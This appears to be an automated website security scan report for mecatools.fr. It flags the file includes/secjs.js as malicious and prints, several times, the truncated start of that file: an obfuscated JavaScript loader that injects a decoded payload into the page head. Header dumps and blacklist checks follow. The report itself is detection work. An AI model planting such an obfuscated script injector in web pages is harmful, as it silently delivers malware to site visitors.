Scanned pages/files
Request | Server response | Status |
http://mecatools.fr/ | 200 OK Content-Length: 34957 Content-Type: text/html | clean |
http://mecatools.fr/./includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21967 Content-Type: text/javascript | clean |
http://mecatools.fr/includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E Antivirus reports:
| ||
http://mecatools.fr/./ | 200 OK Content-Length: 34936 Content-Type: text/html | clean |
http://mecatools.fr/././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://mecatools.fr/./includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E Antivirus reports:
| ||
http://mecatools.fr/././ | 200 OK Content-Length: 34936 Content-Type: text/html | clean |
http://mecatools.fr/./././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://mecatools.fr/././includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E Antivirus reports:
| ||
http://mecatools.fr/./././ | 200 OK Content-Length: 34943 Content-Type: text/html | clean |
http://mecatools.fr/././././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://mecatools.fr/./././includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E Antivirus reports:
| ||
http://mecatools.fr/././././ | 200 OK Content-Length: 34957 Content-Type: text/html | clean |
http://mecatools.fr/./././././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mecatools.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 17 Apr 2014 22:26:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE
Set-Cookie: 60gpBAK=R1224196865; path=/; expires=Thu, 17-Apr-2014 23:33:52 GMT
Set-Cookie: 60gp=R717391862; path=/; expires=Thu, 17-Apr-2014 23:31:54 GMT
Set-Cookie: PHPSESSID=b0e82414f54577d84521838dff43d0ad; path=/
Set-Cookie: javascript=deleted; expires=Wed, 17-Apr-2013 22:26:31 GMT
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: mecatools.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 17 Apr 2014 22:26:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE
Set-Cookie: 60gpBAK=R1224196865; path=/; expires=Thu, 17-Apr-2014 23:33:52 GMT
Set-Cookie: 60gp=R717391862; path=/; expires=Thu, 17-Apr-2014 23:31:54 GMT
Set-Cookie: PHPSESSID=b0e82414f54577d84521838dff43d0ad; path=/
Set-Cookie: javascript=deleted; expires=Wed, 17-Apr-2013 22:26:31 GMT
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: mecatools.fr
Referer: http://www.google.com/search?q=mecatools.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mecatools.fr
Referer: http://www.google.com/search?q=mecatools.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mecatools.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mecatools.fr/
Result: mecatools.fr is not infected or malware details are not published yet.
Result: mecatools.fr is not infected or malware details are not published yet.